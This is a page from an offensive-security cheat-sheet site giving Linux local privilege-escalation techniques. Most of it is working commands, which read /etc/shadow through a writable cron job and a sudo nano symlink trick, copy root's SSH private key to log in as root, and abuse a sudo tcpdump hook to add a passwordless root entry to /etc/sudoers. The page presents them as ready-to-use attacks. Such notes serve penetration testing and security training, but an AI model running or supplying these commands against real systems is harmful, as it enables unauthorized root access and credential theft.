🕺
CheatSheets
  • Introduction
  • Getting Started With Hacking
  • VMs on Mac
  • Windows
    • Enumeration
    • Local Privilege Escalation
    • UAC Bypasses
    • Persistance
    • Networking
  • Active Directory
    • Offensive Powershell
    • Enumeration
      • BloodHound
    • Lateral Movement
    • Escalation
      • ACL Abuse
      • Kerberoasting
      • Un-Constrained Delegation
      • JEA
    • Persistance
    • Mimikatz
    • Alternate Cred Dumps
    • MSSQL
    • Defences and Bypasses
    • Setting Up a Lab
  • Red Teaming
    • Phishing Payloads
    • Cobalt Strike
    • Metasploit
    • Sliver
  • Linux
    • Networking
    • Enumeration
    • Local Privilege Escalation
    • Persistance
    • MySQL
  • Mainframes
    • HP Nonstop
    • IBM z/OS
  • Cloud
    • AWS
    • GCP
    • Azure
  • Web App
    • Tomcat
    • SQLMap
    • PHP
  • Mobile
    • Android
    • iOS
  • Exploit-Dev
    • Linux
      • Basic Stack Overflows
      • Bypassing NX (DEP)
      • Bypassing ASLR
    • Shellcode
    • Windows
  • WiFi
    • Alfa AWUS036ACH Setup
    • Aircrack-ng
Powered by GitBook
On this page
  • SUID
  • Cron
  • Readable SSH
  • Symlink
  • TCPDump

Was this helpful?

  1. Linux

Local Privilege Escalation

SUID

find / -perm -4000 2>/dev/null 

Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files.

Cron

# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;

# Look at when it will run and who as
cat /etc/crontab

# Get it to write to shadow file 
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob

Readable SSH

# Check listing root
ls -la /root

# Check listing ssh
ls -la /root/.ssh 

# Read file (worth trying even if you cant list contents of .ssh
cat /root/.ssh/id_rsa

# Make SSH dir
mkdir /home/<user>/.ssh

# Copy SSH into it 
cp /root/.ssh/id_rsa /home/<user>/.ssh

# Change Perms 
chmod o-rwx /home/<user>/.ssh/id_rsa

# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhost

Symlink

# Check sudo rights 
sudo -l 

# If you have sudo rights for something like nano on a specific file
# Create symlink to link that file to shadow and then read it 
# File in example is readme.txt

 ln -s /etc/shadow readme.txt
 
 # Link to proper terminal
 export TERM=xterm

#Read file
sudo nano readme.txt

TCPDump

# If tcpdump is in sudo list then we can abuse

# Create a file /tmp/elevate

#!/bin/bash
echo “james ALL=(root) NOPASSWD: ALL” >> /etc/sudoers

chmod +x /tmp/elevate
 
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

sudo bash
PreviousEnumerationNextPersistance

Last updated 4 years ago

Was this helpful?